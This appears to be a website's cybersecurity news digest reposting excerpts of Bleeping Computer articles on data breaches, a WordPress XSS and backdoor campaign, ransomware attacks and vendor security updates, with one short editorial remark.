Voter info for millions of Indonesians shared on hacker forum

Bleeping Computer

A threat actor has shared the 2014 voter information for close to 2 million Indonesians on a well-known hacker forum and claims they will release a total of 200 million at a later date.

In the forum post, the threat actor states that the voter records are stored in individual PDF files that they took from the KPU, the general election commission of Indonesia.

Full article

Our conclution

What is stored in network connected computers not only can but will be leaked at some point!

EasyJet hacked: data breach affects 9 million customers

Bleeping Computer

Markus Mainka /

EasyJet, the UK’s largest airline, has disclosed that they were hacked and that the email addresses and travel information for 9 million customers were exposed. For some of these customers, credit card details were also accessed by the attackers.

In a data breach notification disclosed today, EasyJet states that they have suffered a cyberattack, and an unauthorized third-party was able to gain access to their systems.

During this attack, the threat actors were able to access the email addresses and travel information for nine million customers. For approximately 2,208 customers, credit card details were also exposed.

Full article

Massive campaign targets 900,000 WordPress sites in a week

Bleeping Computer

Hackers have launched a massive attack against more than 900,000 WordPress sites seeking to redirect visitors to malvertising sites or plant a backdoor if an administrator is logged in.

Based on the payload, the attacks seem to be the work of a single threat actor, who used at least 24,000 IP‌ addresses over the past month to send malicious requests to more than 900,000 sites.

XSS, malvertising, backdoor

Compromise attempts increased after April 28. WordPress security company Defiant, makers of Wordfence security plugin, detected on May 3 over 20 million attacks against more than half a million websites.

Ram Gall, senior QA at Defiant, said that the attackers focused mostly on exploiting cross-site scripting (XSS) vulnerabilities in plugins that received a fix months or years ago and had been targeted in other attacks.

Redirecting visitors to malvertising is one effect of a successful compromise. If the JavaScript is executed by the browser of an administrator that is logged in, the code tries to inject a PHP backdoor in the theme’s header file along with another JavaScript.

The backdoor then gets another payload and stores it in the theme’s header in an attempt to execute it. “This method would allow the attacker to maintain control of the site” Gall explains.

This way, the attacker could switch to a different payload that could be a webshell, code that creates a malicious admin or for deleting the content of the entire site. In the report today, Defiant included indicators of compromise for the final payload.

Full article

Office 365 to stop data theft by disabling external forwarding

Bleeping Computer

Microsoft is planning to put a stop to enterprise data theft via email forwarding by disabling Office 365’s email forwarding to external recipients by default.

The company also wants to add improved external email forwarding controls which will allow Office 365 admins to enable the feature only to select employees in their organizations.

Full article

Twitter kills SMS-based tweeting in most countries

Bleeping Computer

witter announced today that it has turned off the Twitter via SMS service because of security concerns, a service which allowed the social network’s users to tweet using text messages since its early beginnings.

“We want to continue to help keep your account safe,” the company’s support account tweeted earlier today. 

“We’ve seen vulnerabilities with SMS, so we’ve turned off our Twitter via SMS service, except for a few countries.”

However, as the company added, Twitter users will still be able to use “important SMS messages” to log in onto the platform and to manage their accounts.

Full article

Microsoft investigating Windows 10 KB4549951 BSOD reports

Bleeping Computer

Microsoft is investigating Bluetooth issues, failures to install, and blue screen reports received from users who have installed or attempted to install the KB4549951 cumulative update released during this month’s Patch Tuesday.

KB4549951 provides customers with security fixes for devices running Windows 10, version 1909, and Windows 10, version 1903, and it can be installed automatically by checking for updates via Windows Update or manually from the Microsoft Update Catalog.

Windows admins can also distribute the update to users via Windows Server Update Services (WSUS). Customers who have automatic updates enabled don’t need to take any further actions.

As we have reported last week, users are reporting a wide assortment of issues when installing and after deploying KB4549951, ranging from blue screens of death (BSODs), failures to install, networking issues, display issues, and system freezes when trying to use streaming services.

Others are saying that their Windows 10 installation is completely broken with their devices being unable to boot again after installing the KB4549951 update.

Full article

The Week in Ransomware – April 24th 2020 – High Profile Attacks

Bleeping Computer

There was not a lot of new variants released this week, but we did have some attacks on high profile victims.

This past weekend it came to light that IT service giant Cognizant suffered a Maze Ransomware attack. Strangely, while Cognizant is stating it was Maze, the ransomware operators are denying it.

DoppelPaymer also started to leak data for the City of Torrance in California who was attacked on March 1st.

Other than that, we have seen a few new variants released this week and the unfortunate continued targeting of hospitals by ransomware operators.

Full article

Microsoft releases OOB security updates for Microsoft Office

Bleeping Computer

Microsoft has released an out-of-band security update that fixes remote code execution vulnerabilities in an Autodesk FBX library integrated into Microsoft Office and Paint 3D applications.

Last month, Autodesk issued security updates for their Autodesk FBX Software Development Kit that resolves remote code execution and denial of service vulnerabilities caused by specially crafted FBX files.

An FBX file is an Autodesk file format that is used to store 3D models, assets, shapes, and animations.

To exploit these vulnerabilities, an attacker would create a malicious FBX file that would exploit “buffer overflow, type confusion, use-after-free, integer overflow, NULL pointer dereference, and heap overflow vulnerabilities” to perform a DoS attack or remotely execute code.

Microsoft Office uses the Autodesk FBX library

As the Microsoft Office 2016, Microsoft 2019, Office 365, and Paint 3D applications utilize the Autodesk FBX library, Microsoft has released today new security updates that resolve these remote code execution and DoS vulnerabilities in their products.

In an advisory titled “ADV200004 | Availability of updates for Microsoft software utilizing the Autodesk FBX library”, Microsoft explains that opening malicious FBX files in Office applications could lead to remote code execution.

Full article

267 million Facebook profiles sold for $600 on the dark web

Bleeping Computer

Threat actors are selling over 267 million Facebook profiles for £500 ($623) on dark web sites and hacker forums. While none of these records include passwords, they do contain information that could allow attackers to perform spear phishing or SMS attacks to steal credentials.

Last month, security researcher Bob Diachenko discovered an open Elasticsearch database that contained a little over 267 million Facebook records, with most being users from the United States.

For many of these records, they contained a user’s full name, their phone number, and a unique Facebook ID.

The ISP hosting the database eventually took the server offline after being contacted by Diachenko.

Soon after, a second server containing the same data plus an addition 42 million records was brought online but was quickly attacked by unknown threat actors who left a message telling the owners to secure their servers.

Of this new data, 16.8 million records included more information such as a Facebook user’s email address, birth date, and gender.

It was not discovered who these servers belonged to, but Diachenko believed that it was owned by a criminal organization who stole the data using the Facebook API before it was locked down or via scraping public profiles.

Full article